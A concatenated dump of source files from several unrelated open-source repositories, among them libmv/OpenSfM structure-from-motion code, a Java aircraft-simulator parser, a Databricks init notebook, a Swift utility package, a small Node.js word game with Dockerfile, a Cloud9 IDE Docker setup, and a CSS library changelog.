// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
#include <iostream>
#include <algorithm>
#include "libmv/base/vector.h"
#include "libmv/multiview/fundamental.h"
#include "libmv/multiview/robust_five_point.h"
#include "libmv/multiview/fundamental_test_utils.h"
#include "libmv/multiview/projection.h"
#include "libmv/multiview/test_data_sets.h"
#include "libmv/numeric/numeric.h"
#include "testing/testing.h"
#include "libmv/logging/logging.h"
namespace {
using namespace libmv;
TEST(RobustFivePoint, FivePointAlgorithmRobustNoOutliers) {
TwoViewDataSet d = TwoRealisticCameras();
Mat3 E_estimated;
vector<int> inliers;
FivePointAlgorithmRobust(d.x1, d.x2, d.K1, d.K2,
1.0, &E_estimated, &inliers);
EXPECT_EQ(d.x1.cols(), inliers.size());
Mat3 E_gt;
EssentialFromRt(d.R1, d.t1, d.R2, d.t2, &E_gt);
// Normalize.
Mat3 E_gt_norm, E_estimated_norm;
NormalizeFundamental(E_gt, &E_gt_norm);
NormalizeFundamental(E_estimated, &E_estimated_norm);
LOG(INFO) << "E_gt_norm =\n" << E_gt_norm;
LOG(INFO) << "E_estimated_norm =\n" << E_estimated_norm;
EXPECT_MATRIX_NEAR(E_gt_norm, E_estimated_norm, 1e-8);
}
TEST(RobustFivePoint, FivePointAlgorithmRobust) {
TwoViewDataSet d = TwoRealisticCameras();
d.X = 3 * Mat::Random(3, 50);
LOG(INFO) << "X = \n" << d.X;
Project(d.P1, d.X, &d.x1);
Project(d.P2, d.X, &d.x2);
LOG(INFO) << "x1 = \n" << d.x1;
LOG(INFO) << "x2 = \n" << d.x2;
Mat x1s, x2s;
HorizontalStack(d.x1, 400 * Mat::Random(2, 20), &x1s);
HorizontalStack(d.x2, 400 * Mat::Random(2, 20), &x2s);
// Compute Essential matrix from correspondences.
Mat3 E_estimated;
vector<int> inliers;
FivePointAlgorithmRobust(x1s, x2s, d.K1, d.K2,
1.0, &E_estimated, &inliers);
LOG(ERROR) << "Number of inliers = " << inliers.size();
EXPECT_LE(d.x1.cols(), inliers.size()); // Some outliers may be considered
// inliers, that's fine.
Mat3 E_gt;
EssentialFromRt(d.R1, d.t1, d.R2, d.t2, &E_gt);
// Normalize.
Mat3 E_gt_norm, E_estimated_norm;
NormalizeFundamental(E_gt, &E_gt_norm);
NormalizeFundamental(E_estimated, &E_estimated_norm);
LOG(INFO) << "E_gt_norm =\n" << E_gt_norm;
LOG(INFO) << "E_estimated_norm =\n" << E_estimated_norm;
EXPECT_MATRIX_NEAR(E_gt_norm, E_estimated_norm, 1e-8);
}
} // namespace
<file_sep>#ifndef __HAHOG_H__
#define __HAHOG_H__
#include "types.h"
namespace csfm {
bp::object hahog(PyObject *image,
float peak_threshold,
float edge_threshold);
}
#endif // __HAHOG_H__
<file_sep>
#include "libmv/multiview/robust_five_point.h"
#include "libmv/multiview/fundamental.h"
#include "libmv/multiview/projection.h"
#include "libmv/multiview/nviewtriangulation.h"
#include "libmv/tools/tool.h"
#include <iostream>
#include <fstream>
#include <string>
#include "types.h"
namespace csfm {
bp::object TwoViewReconstruction(PyObject *x1_object,
PyObject *x2_object,
double focal1,
double focal2,
double threshold) {
using namespace libmv;
PyArrayContiguousView<double> x1_array((PyArrayObject *)x1_object);
PyArrayContiguousView<double> x2_array((PyArrayObject *)x2_object);
assert(x1_array.shape(0) == x2_array.shape(0));
assert(x1_array.shape(1) == 2);
assert(x2_array.shape(1) == 2);
// Create matches matrices.
int n_matches = x1_array.shape(0);
LOG(INFO) << "Num matches: " << n_matches;
if (n_matches < 5) return bp::object();
Eigen::Map<const libmv::Mat> x1(x1_array.data(), 2, n_matches);
Eigen::Map<const libmv::Mat> x2(x2_array.data(), 2, n_matches);
// Create calibration matrices.
Mat3 K1, K2;
K1 << focal1, 0, 0,
0, focal1, 0,
0, 0, 1;
K2 << focal2, 0, 0,
0, focal2, 0,
0, 0, 1;
// Compute Essential matrix.
Mat3 E;
vector<int> inliers;
FivePointAlgorithmRobust(x1, x2, K1, K2,
threshold, &E, &inliers);
LOG(INFO) << "Num inliers: " << inliers.size();
if (inliers.size() < 5) return bp::object();
// Compute R and t.
Mat3 R;
Vec3 t;
int a = inliers[inliers.size() / 2]; // Choose a random inlier.
MotionFromEssentialAndCorrespondence(E,
K1, x1.col(a),
K2, x2.col(a),
&R, &t);
// Convert results to numpy arrays.
Eigen::Matrix<double, 3, 3, Eigen::RowMajor> R_row_major = R;
bp::list retn;
npy_intp R_shape[2] = {3, 3};
npy_intp t_shape[1] = {3};
npy_intp inliers_shape[1] = {inliers.size()};
retn.append(bpn_array_from_data(2, R_shape, R_row_major.data()));
retn.append(bpn_array_from_data(1, t_shape, t.data()));
retn.append(bpn_array_from_data(1, inliers_shape, &inliers[0]));
return retn;
}
}
<file_sep>#!/usr/bin/env python
'''
Script for writing GPS positions from reconstruction to the images.
It requires the reconstruction
'''
import os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import json
import numpy as np
import pyexiv2
from opensfm import dataset
from opensfm.geotag_from_gpx import add_gps_to_exif
parser = argparse.ArgumentParser(
description='Write updated geotag information to image files.'
' It requires a reconstruction with updated GPS positions.'
' This can be obtained by running the bin/align script.')
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--overwrite_originals',
help='write geotag back to the original images.'
' By default, the updated images are written in dataset/images_updated_geotag'
' and the original images are not overwritten.',
action='store_true')
parser.add_argument('--image_path',
help='path to images')
args = parser.parse_args()
# This script assumes that the reconstruction contains aligned gps, altitude and direction information about the images (after bin/align data_path)
data_path = args.dataset
data = dataset.DataSet(data_path) # assumes that the images is in data_path/'images'
if args.image_path: data.set_image_path(args.image_path)
updated_image_path = os.path.join(data.data_path, 'images_updated_geotag')
if not args.overwrite_originals and not os.path.exists(updated_image_path):
os.makedirs(updated_image_path)
reconstructions = data.load_reconstruction()
for reconstruction in reconstructions:
# write updated gps/compass to the image file
for image in reconstruction['shots'].keys():
image_path = data.image_file(image)
new_image_path = None if args.overwrite_originals else os.path.join(updated_image_path, image)
gps = reconstruction['shots'][image]['gps']
add_gps_to_exif(image_path, gps['lat'], gps['lon'], gps['altitude'], gps['direction'], new_image_path)
<file_sep>OpenSfM
=======
Structure from Motion library written in Python on top of OpenCV.
## Dependencies
* [OpenCV][]
* [Ceres Solver][]
* [Boost Python][]
* [NumPy][], [SciPy][], networkx, PyYAML, exifread
### Installing dependencies on MacOSX
Use
brew tap homebrew/science
brew install opencv
brew install homebrew/science/ceres-solver
brew install boost
sudo pip install -r requirements.txt
Be sure to update your `PYTHONPATH` to include `/usr/local/lib/python2.7/site-packages` where OpenCV has been installed:
export PYTHONPATH=/usr/local/lib/python2.7/site-packages:$PYTHONPATH
### Installing dependencies on Ubuntu
1. [OpenCV][] - Install by following the steps in the Ubuntu OpenCV [installation guide](https://help.ubuntu.com/community/OpenCV). An alternative instruction tested for Ubuntu 10.04 can be found at [OpenCV Docs](http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html). OpenCV requires [GCC](https://gcc.gnu.org/) and [CMake](http://www.cmake.org/) among other things.
2. [Ceres solver][] - Build Ceres according the [documentation](http://ceres-solver.org/building.html). Make sure to read the Linux note, follow the shared library instructions and compile Ceres with the -fPIC option. Install Ceres from the ceres-bin directory after `make` by:
sudo make install
3. [Boost Python][] - Install through apt-get:
sudo apt-get install libboost-python-dev
4. [NumPy][], networkx, PyYaml, exifread - Install [pip](https://pypi.python.org/pypi/pip) and then run the following from the root of the project:
sudo pip install -r requirements.txt
5. [SciPy][] - Install [gfortran](https://gcc.gnu.org/wiki/GFortran) through apt-get and then install [SciPy][] with:
sudo apt-get install gfortran
sudo pip install scipy
## Building inplace using setup.py
python setup.py build_clib
python setup.py build_ext --inplace
## Building using CMake
mkdir build
cd build
cmake ../opensfm/src
make
## Running
An example dataset is available at `data/berlin`.
1. Put some images in `data/DATASET_NAME/images/`
2. Put config.yaml in `data/DATASET_NAME/config.yaml`
3. Go to the root of the project and run `bin/run_all data/DATASET_NAME`
4. Start an http server from the root with `python -m SimpleHTTPServer`
5. Browse `http://localhost:8000/viewer/reconstruction.html#file=/data/DATASET_NAME/reconstruction.json`.
[OpenCV]: http://opencv.org/ (Computer vision and machine learning software library)
[NumPy]: http://www.numpy.org/ (Scientific computing with Python)
[SciPy]: http://www.scipy.org/ (Fundamental library for scientific computing)
[Ceres solver]: http://ceres-solver.org/ (Library for solving complicated nonlinear least squares problems)
[Boost Python]: http://www.boost.org/
<file_sep>#!/usr/bin/env python
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import datetime
from subprocess import call
import urllib
import json
import numpy as np
import cv2
from opensfm import dataset
from opensfm import multiview
from opensfm import reconstruction
from opensfm import transformations as tf
def run_dataset(run_root, name):
folder = run_root + '/' + name
call(['cp', 'config.yaml', folder])
call(['bin/run_all', folder])
with open(run_root + '/index.html', 'a') as fout:
s = '''
<a href="/viewer/reconstruction.html#file=../{0}/reconstruction.json">{1}</a><br>
'''.format(urllib.quote(folder), name)
fout.write(s)
def align_reconstructions(rgt, r):
if len(r['shots']) < 3: return
# Compute similarity Xp = s A X + b
X, Xp = [], []
for key in rgt['shots']:
if key in r['shots']:
X.append(reconstruction.optical_center(r['shots'][key]))
Xp.append(reconstruction.optical_center(rgt['shots'][key]))
else:
print 'Shot {0} missing.'.format(key)
X = np.array(X)
Xp = np.array(Xp)
T = tf.superimposition_matrix(X.T, Xp.T, scale=True)
A, b = T[:3,:3], T[:3,3]
s = np.linalg.det(A)**(1./3)
A /= s
reconstruction.apply_similarity(r, s, A, b)
def optical_center_rms(rgt, r):
X = []
Xp = []
for key in r['shots']:
X.append(reconstruction.optical_center(r['shots'][key]))
Xp.append(reconstruction.optical_center(rgt['shots'][key]))
X = np.array(X)
Xp = np.array(Xp)
return np.sqrt(((X - Xp)**2).sum() / len(X))
def focal_length_rms(rgt, r):
f = []
fp = []
for key in r['shots']:
cam = r['shots'][key]['camera']
f.append(r['cameras'][cam]['focal'])
fp.append(rgt['cameras'][cam]['focal'])
f = np.array(f)
fp = np.array(fp)
return np.sqrt(((f - fp)**2).sum() / len(f))
def eval_reconstruction(name, rgt, r):
align_reconstructions(rgt, r)
f = focal_length_rms(rgt, r)
o = optical_center_rms(rgt, r)
print '#####################################################################'
print '# Evaluation for', name
print '# Focal lenght RMS error:', f
print '# Optical center RMS error:', o
print '#####################################################################'
return {
"focal_length_rms": f,
"optical_center_rms": o,
}
def load_strecha_gt_projections(run_root, name):
source = 'eval/datasets/{0}/urd'.format(name)
r = {
'cameras': {},
'shots': {},
}
for i in os.listdir(source):
if i.endswith('.png'):
P = np.loadtxt(source + '/' + i + '.P')
K, R, t = multiview.KRt_from_P(P)
r['cameras']['canon eos d60'] = {
'focal': K[0,0]
}
r['shots'][i] = {
'camera': 'canon eos d60',
'rotation': list(cv2.Rodrigues(R)[0].flat),
'translation': list(t.flat)
}
return r
def eval_strecha_dataset(run_root, name):
exif = {
"camera": "canon eos d60",
"focal_ratio": 0.881057268722467,
"focal_35mm_equiv": 31.718061674008812,
}
folder = run_root + '/' + name
source = '../../../datasets/{0}/urd'.format(name)
call(['mkdir', '-p', folder])
call(['ln', '-s', source, folder + '/images'])
with open(folder + '/exif_overrides.json', 'w') as fout:
d = { '%04d.png'%i: exif for i in range(30)}
json.dump(d, fout, indent=4)
run_dataset(run_root, name)
with open(folder+'/reconstruction.json') as fin:
r = json.load(fin)[0]
rgt = load_strecha_gt_projections(run_root, name)
return eval_reconstruction(name, rgt, r)
if __name__ == '__main__':
if len(sys.argv) == 2:
run_root = sys.argv[1]
else:
run_root = 'eval/runs/' + datetime.datetime.now().isoformat()
# Create evaluation folders
call(['mkdir', '-p', run_root])
# Bundler examples
# for i in ['ET', 'kermit']:
# a = run_root + '/' + i
# call(['mkdir', '-p', a])
# call(['ln', '-s', '../../../datasets/bundler-v0.4-source/examples/' + i, a + '/images'])
# Strecha datasets
results = {}
for name in [
'fountain_dense',
'herzjesu_dense',
'castle_entry_dense',
'castle_dense',
'herzjesu_dense_large',
'castle_dense_large',
]:
results[name] = eval_strecha_dataset(run_root, name)
with open(run_root + '/results.json', 'w') as fout:
json.dump(results, fout, indent=4)
| a5bc815f9d1cb33c1839cb3e88bfea704bccd3df | [
"Markdown",
"Python",
"Text",
"C++",
"Shell"
] | 24 | Python | ktuite/OpenSfM | 3e83cb073e52e6c044ce1e8d66d6307365b4e672 | d3b7b53677899fbe4d86675a49cad413a09aeac2 |
refs/heads/master | <file_sep>#!/bin/sh
javac defPack/*.java
<file_sep>package defPack;
import java.io.BufferedReader;
import java.io.IOException;
import java.util.ArrayList;
public class Parser {
private BufferedReader reader;
private ArrayList<Flyable> flyables;
private AircraftFactory factory;
private WeatherTower tower;
private int changes;
public Parser(BufferedReader reader) {
this.reader = reader;
this.factory = new AircraftFactory();
this.tower = new WeatherTower();
this.flyables = new ArrayList<Flyable>();
this.changes = 0;
extractObjects();
}
public ArrayList<Flyable> getFlyables() {
return flyables;
}
public AircraftFactory getFactory() {
return factory;
}
public WeatherTower getTower() {
return tower;
}
public int getChanges() {
return changes;
}
private void extractObjects() {
String[] parse;
String line = null;
int i = 0;
try {
while ((line = reader.readLine()) != null) {
if (line.isEmpty()) {
System.out.println("Error: first line of scenario file must be an integer.");
continue;
}
if (line != null && !line.isEmpty() && i == 0) {
try {
this.changes = Integer.parseInt(line);
i++;
} catch (NumberFormatException nfe) {
System.out.println("Error: first line of scenario file must be an integer.");
return;
}
} else if (!line.isEmpty() && i != 0) {
parse = line.split(" ");
if (parse.length != 5) {
System.out.println("=))))) Error on line " + i + "! String should have the type, name, coordinate x, coordinate y and coordinate z ");
System.exit(1);
return;
} else {
try {
String aircraftType = parse[0].toLowerCase();
String name = parse[1];
int longitude = Integer.parseInt(parse[2]);
int latitude = Integer.parseInt(parse[3]);
int height = Integer.parseInt(parse[4]);
Flyable newFLyable = factory.newAircraft(aircraftType, name, longitude, latitude, height);
if (newFLyable != null) {
flyables.add(newFLyable);
} else {
System.out.println("Error on line " + i + ": The aircraft \"" + aircraftType + "\" could'n be created.");
}
} catch (NumberFormatException nfe) {
System.out.println("Error on line " + i + ": coordinates should be valid numbers integers. No aircraft was created.");
return;
} catch (Exception ex) {
System.out.println("Error: on line " + i + ":\n" + ex.getLocalizedMessage());
return;
}
}
}
i++;
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
<file_sep>package defPack;
public class WeatherUpdateResult {
public int addLongitude;
public int addLatitude;
public int addHeight;
public String message;
public WeatherUpdateResult(int addLongitude, int addLatitude, int addHeight, String message) {
this.addLongitude = addLongitude;
this.addLatitude = addLatitude;
this.addHeight = addHeight;
this.message = message;
}
public int getAddLongitude() {
return addLongitude;
}
public int getAddLatitude() {
return addLatitude;
}
public int getAddHeight() {
return addHeight;
}
public String getMessage() {
return message;
}
}
| fba0287bcf6f7ec9b4f913d3137ae800f3f7473f | [
"Java",
"Shell"
] | 3 | Shell | aalokhin/avaj_Jenkins_test | 77d3bb67995823f7351c2b6837a266938c4e7bd2 | d676f9e36907867e50cc7515a6f350dbd74e04b9 |
refs/heads/master | <repo_name>v-jyveer/test<file_sep>/notebooks/Users/v-jyveer@microsoft.com/init notebook.py
# Databricks notebook source
dbutils.fs.mkdirs("dbfs:/databricks/scripts/globalinit")
# COMMAND ----------
display(dbutils.fs.ls("dbfs:/databricks/scripts/globalinit/postgresql-install.sh"))
# COMMAND ----------
dbutils.fs.put("dbfs:/databricks/scripts/globalinit/postgresql-install.sh" ,"""
#!/bin/bash
echo "hello" >> /hello.txt
""", True)
# COMMAND ----------
# MAGIC %sh head /dbfs/databricks/scripts/globalinit/postgresql-install.sh
# COMMAND ----------
dbutils.fs.put("/databricks/scripts/globalinit/postgresql-install.sh","""
#!/bin/bash
wget --quiet -O /mnt/driver-daemon/jars/postgresql-42.2.2.jar http://central.maven.org/maven2/org/postgresql/postgresql/42.2.2/postgresql-42.2.2.jar
wget --quiet -O /mnt/jars/driver-daemon/postgresql-42.2.2.jar http://central.maven.org/maven2/org/postgresql/postgresql/42.2.2/postgresql-42.2.2.jar""", True)
# COMMAND ----------
display(dbutils.fs.ls("dbfs:/databricks/scripts/globalinit/"))
# COMMAND ----------
dbutils.fs.ls ("dbfs:/cluster-logs/")<file_sep>/README.md
# test
testing the first github code and usage
changes test
| a5f06805d7b59eface97e52758a0bcf70a144fe9 | [
"Markdown",
"Python"
] | 2 | Python | v-jyveer/test | 0d6698e0f630a3bb52e7aede6cb642225afab328 | 074bca792bfdeeade8b4ffcd1ea8ae4b365957e9 |
refs/heads/master | <repo_name>jorgegomezdeveloper/CustomToolsSTGPackage<file_sep>/Sources/CustomToolsSTGPackage/BorderTools.swift
//
// BorderTools.swift
// CustomToolsSTGPackage
//
// Created by Jorge GA-studiogenesis on 28/04/2021.
// Copyright © 2021 Jorge GA-studiogenesis. All rights reserved.
//
import SwiftUI
extension UIView {
public func setBorderLikeTextField() {
self.layer.cornerRadius = 4
self.layer.borderWidth = 0.9
self.layer.borderColor = #colorLiteral(red: 0.8235294118, green: 0.8235294118, blue: 0.8235294118, alpha: 1)
}
}
<file_sep>/README.md
# CustomToolsSTGPackage
A description of this package.
<file_sep>/Tests/LinuxMain.swift
import XCTest
import CustomToolsSTGPackageTests
var tests = [XCTestCaseEntry]()
tests += CustomToolsSTGPackageTests.allTests()
XCTMain(tests)
<file_sep>/Sources/CustomToolsSTGPackage/SoundVibrationTools.swift
//
// SoundVibrationTools.swift
// CustomToolsSTGPackage
//
// Created by <NAME> on 28/04/2021.
// Copyright © 2021 <NAME>-studiogenesis. All rights reserved.
//
import AVFoundation
public class SoundVibrationTools {
public init() {
}
public enum SoundExtensionType: String {
case wav
case mp3
case mp4
}
public func generateVibration() {
AudioServicesPlaySystemSound(kSystemSoundID_Vibrate)
}
public func generateSoundAlert(soundName: String = "", extentionFile: SoundExtensionType = .wav, soundId: Int = 1000) {
if let soundURL = Bundle.main.url(forResource: soundName, withExtension: extentionFile.rawValue) {
var mySound: SystemSoundID = 0
AudioServicesCreateSystemSoundID(soundURL as CFURL, &mySound)
AudioServicesPlaySystemSound(mySound);
} else {
AudioServicesPlayAlertSound(SystemSoundID(soundId))
}
}
}
<file_sep>/Sources/CustomToolsSTGPackage/EmailTools.swift
//
// EmailTools.swift
// CustomToolsSTGPackage
//
// Created by <NAME>-studiogenesis on 28/04/2021.
// Copyright © 2021 Jorge GA-studiogenesis. All rights reserved.
//
import SwiftUI
extension String {
public func isValidEmail() -> Bool {
let emailRegEx = "[A-Z0-9a-z._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}"
let emailTest = NSPredicate(format: "SELF MATCHES %@", emailRegEx)
return emailTest.evaluate(with: self)
}
public func openEmail() {
if self.isValidEmail() {
if let url = URL(string: "mailto:\(self)") {
if #available(iOS 10.0, *) {
UIApplication.shared.open(url)
} else {
// Fallback on earlier versions
}
}
}
}
}
| 47abc524910e850a67643cba961c757e3b14ad08 | [
"Swift",
"Markdown"
] | 5 | Swift | jorgegomezdeveloper/CustomToolsSTGPackage | aed112f8f1e5fa0306f33257857c9e8b04405029 | 1e3b7695d080f00927ac048246f7fd2338f313b2 |
refs/heads/master | <file_sep># guesswho
A dumb game written late in the weekend
<file_sep>
class Application {
constructor() {
this.knownWords = new Set();
this.wordList = document.getElementById('list');
this.wordInput = document.getElementById('word');
const buttons = [1, 2, 3, 4, 5];
for (let i = 0; i < buttons.length; i++) {
const value = buttons[i];
document.getElementById('add-' + value)
.addEventListener('click', (_) => this.buttonClicked(value));
}
this.preloadWords();
}
buttonClicked(value) {
const word = this.wordInput.value;
this.addNewWord({ word: word, value: value });
}
preloadWords() {
fetch('/word-list/custom-words')
.then(words => words.json())
.then(words => {
const wordList = words['words'];
for (let i = 0; i < wordList.length; i++) {
this.addNewWord(wordList[i], false, false);
}
});
}
addNewWord(wordData, check = true, send = true) {
if (check) {
if (this.knownWords.has(wordData.word)) {
alert('Word already exists!');
return;
}
}
this.knownWords.add(wordData.word);
if (send)
this.sendWord(wordData);
this.addWordToList(wordData);
this.wordInput.focus();
}
addWordToList(wordData) {
const {word, value} = wordData;
const listItem = document.createElement('li');
const wordSpan = document.createElement('span');
const valueSpan = document.createElement('span');
wordSpan.innerText = word;
valueSpan.innerText = value.toString();
valueSpan.className = 'vl' + value;
listItem.appendChild(wordSpan);
listItem.appendChild(valueSpan);
this.wordList.insertBefore(listItem, this.wordList.firstChild);
this.wordInput.value = '';
}
sendWord(wordData) {
const response = fetch('/add-word/custom-words', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
redirect: 'follow',
referrerPolicy: 'no-referrer',
body: JSON.stringify(wordData)
});
response.then(() => {});
}
};
window.runApp = () => {
const app = new Application();
};
console.log("loaded");
<file_sep>FROM node:12-alpine
USER node
WORKDIR /app
COPY package.json yarn.lock /app/
RUN yarn
COPY data/ /app/data/
COPY static/ /app/static/
COPY index.js /app/
EXPOSE 8080
CMD [ "yarn", "start" ]
<file_sep>const fs = require('fs');
const path = require('path');
const words = fs.readFileSync('./data/words.txt', { encoding: 'utf-8' }).split('\n');
const express = require('express');
const app = express();
app.use(express.json());
const static = express.static('./static');
app.use(static);
app.get('/word', (req, resp) => {
const choice = Math.floor(Math.random() * words.length);
resp.send(words[choice]);
});
app.get('/words', (req, resp) => {
resp.sendFile(path.join(__dirname, './static/words.html'));
});
app.get('/play/:duration', (req, resp) => {
resp.sendFile(path.join(__dirname, './static/index.html'));
});
app.get('/word-list/:list', (req, resp) => {
const listName = req.params['list'] || 'custom-words';
const listFile = path.join(__dirname, `db/${listName}.json`);
resp.sendFile(listFile);
});
app.post('/add-word/:list', (req, resp) => {
const listName = req.params['list'] || 'custom-words';
const listFile = path.join(__dirname, `db/${listName}.json`);
const newWord = req.body;
fs.promises.readFile(listFile, { encoding: 'utf-8' })
.then(data => JSON.parse(data))
.then(json => {
json['words'].push(newWord)
const jsonText = JSON.stringify(json, null, 2);
return fs.promises.writeFile(listFile, jsonText, { encoding: 'utf-8' })
})
.then(() => resp.send('ok'));
});
app.listen(8080, () => console.log("Server started!"));
| 1cef42858b1630e9d730ec6d3e3d18c5aa6c1641 | [
"Markdown",
"JavaScript",
"Dockerfile"
] | 4 | Markdown | MatanShahar/guesswho | 10519f03a49ea03e7af4c8e6967549284717e91b | 220b75ee8201276b9cf9e2ce74e9280bbf74bb08 |
refs/heads/master | <repo_name>chuyskywalker/docker-cloud9-ide<file_sep>/run.sh
docker run -d --name c9 -v /var/git:/workspace -p 8080:80 chuyskywalker/cloud9-ide
<file_sep>/Dockerfile
FROM ubuntu
# Install build items, clone in c9, build c9, install dumb-init, remove all build items and cleanup
RUN apt-get update \
&& apt-get install -y wget build-essential git python \
\
&& git clone --depth=1 git://github.com/c9/core.git /c9 \
&& /c9/scripts/install-sdk.sh \
&& mkdir /workspace \
\
&& wget https://github.com/Yelp/dumb-init/releases/download/v1.0.3/dumb-init_1.0.3_amd64.deb \
&& dpkg -i dumb-init_*.deb \
\
&& apt-get purge -y wget build-essential git python \
&& apt-get autoremove -y --purge \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
VOLUME /workspace
CMD [ "dumb-init", "/root/.c9/node/bin/node", "/c9/server.js", "--listen", "0.0.0.0", "-p", "80", "-a", ":", "-w", "/workspace" ]
<file_sep>/readme.md
# Cloud9 IDE in Docker
Run this for a quick browser-based IDE from your docker host.
```
# cd to the directory you want to edit
docker run -ti --rm -v `pwd`:/workspace -p 80:80 chuyskywalker/cloud9-ide
```
Then visit your docker host in your browser.
| df56143e8053d76f552a01a685669f5526a03c81 | [
"Markdown",
"Dockerfile",
"Shell"
] | 3 | Shell | chuyskywalker/docker-cloud9-ide | 5c02ff104c125c96db954212592a38bbaba084a2 | 7d9d4931c14bda8b85ab6e2d773d4d3965477eb2 |
refs/heads/master | <file_sep>package com.devnouh.myapplication;
import androidx.annotation.NonNull;
import java.io.Serializable;
class Photo implements Serializable {
private String title;
private String link;
private String author;
private String ID;
private String image;
Photo(String title, String link, String author, String ID, String image) {
this.title = title;
this.link = link;
this.author = author;
this.ID = ID;
this.image = image;
}
String getTitle() {
return title;
}
String getLink() {
return link;
}
String getAuthor() {
return author;
}
String getID() {
return ID;
}
String getImage() {
return image;
}
@NonNull
@Override
public String toString() {
return "title" + title;
}
}
<file_sep>package com.devnouh.myapplication;
import android.annotation.SuppressLint;
import android.app.AlertDialog;
import android.content.Context;
import android.content.res.Resources;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.TextView;
class ShowDetailsDilaog {
private Photo mPhoto;
private Context mContext;
ShowDetailsDilaog(Context context, Photo photo) {
this.mPhoto = photo;
this.mContext = context;
}
void show() {
Resources r = mContext.getResources();
@SuppressLint("InflateParams")
View v = LayoutInflater.from(mContext).inflate(R.layout.show_dialog_details, null);
TextView tv_title = v.findViewById(R.id.details_title);
TextView tv_author = v.findViewById(R.id.details_author);
TextView tv_author_id = v.findViewById(R.id.details_author_id);
TextView tv_tags = v.findViewById(R.id.details_tags);
tv_title.setText(r.getString(R.string.details_title, mPhoto.getTitle()));
tv_author.setText(r.getString(R.string.details_author, mPhoto.getAuthor()));
tv_author_id.setText(r.getString(R.string.details_author_id, mPhoto.getID()));
// tv_tags.setText(r.getString(R.string.details_tags,mPhoto.getTags()));
AlertDialog.Builder alertDialog = new AlertDialog.Builder(mContext);
alertDialog.setView(v).show();
}
}
<file_sep>package com.devnouh.myapplication;
import android.app.SearchManager;
import android.app.SearchableInfo;
import android.content.SharedPreferences;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import androidx.appcompat.widget.Toolbar;
import android.preference.PreferenceManager;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.SearchView;
public class SearchActivity extends AppCompatActivity {
SearchView sv;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_search);
Toolbar toolbar = findViewById(R.id.toolbar);
setSupportActionBar(toolbar);
getSupportActionBar().setDisplayHomeAsUpEnabled(true);
com.devnouh.myapplication.MainActivity.running = false;
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.search_activity_menu, menu);
SearchManager sm = (SearchManager) getSystemService(SEARCH_SERVICE);
sv = (SearchView) menu.findItem(R.id.search_act).getActionView();
SearchableInfo searchableInfo = sm.getSearchableInfo(getComponentName());
sv.setSearchableInfo(searchableInfo);
sv.setQueryHint("search for tags");
sv.setIconified(false);
sv.setOnCloseListener(new SearchView.OnCloseListener() {
@Override
public boolean onClose() {
finish();
return true;
}
});
sv.setOnQueryTextListener(new SearchView.OnQueryTextListener() {
@Override
public boolean onQueryTextSubmit(String query) {
SharedPreferences shared = PreferenceManager.getDefaultSharedPreferences(SearchActivity.this);
shared.edit().putString("TAGS", query).apply();
sv.clearFocus();
finish();
return true;
}
@Override
public boolean onQueryTextChange(String newText) {
return false;
}
});
return true;
//return super.onCreateOptionsMenu(menu);
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
return super.onOptionsItemSelected(item);
}
}
| a73ec17b86e21a8cfd1b4d5a44e1a9f39ee8c737 | [
"Java"
] | 3 | Java | noah20/Flickr-app | 708ee04f522d8f25705879356462974c1ffaabf7 | df8f7b41378a06d6f90fcd34d161ca937db3a4f2 |
refs/heads/master | <repo_name>tjj5036/lego<file_sep>/CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.
This project adheres to [Semantic Versioning](http://semver.org/).
This file follows the format suggested by [Keep a CHANGELOG](https://github.com/olivierlacan/keep-a-changelog).
## [Unreleased][unreleased]
## [3.0.0][3.0.0] - 2015-09-01
### Added
- [Patch] Add "Charcoal" color `#383838`.
- [Patch] Checks to see if `$include-fonts` map exists. Allows usage of Lego without being forced to include brand font. (#90)
### Removed
- [Release] Remove `.lego-tag` from Core. (#72)
### Changed
- [Patch] Bump font weight for `.weight--bold` class to `600` so its the same as a `<b>` tag.
- [Patch] Updated font styles for `.lego-table th`
### Fixed
- [Patch] Change the weight of `<b>` and `<strong>` tags to `600`.
## [2.0.0][2.0.0] - 2015-08-18
### Changed
- [Release] Major refactor of button styles and class names. New available class names are `.lego-button--highlight`, `lego-button--outline`, `.lego-button--outline-reverse`, `.lego-button--extra`, `.lego-button--dismiss`. `.lego-button--brand` has been deprecated. Usage for classes to follow shortly. (#92) (#85) (#74)
- [Release] Added `!important` to buttons so that when used as anchors the color is consistent.
## [1.0.0][1.0.0] - 2015-08-18
### Fixed
- [Patch] Change comments in `_spinner.scss` to refer to `.lego-overlay` since `.lego-spinner-wrap` doesn't exist. (#76)
### Changed
- [Patch] Removed concatenation from the `@font-face` URL strings because it was breaking the SCSS parser used for documentation generation.
- [Release] Renaming sizing trumps to be BEM consistent. (#69)
### Removed
- [Patch] Remove old gitignore targets from js days. (#97)
## [0.0.3][0.0.3] - 2015-08-05
### Added
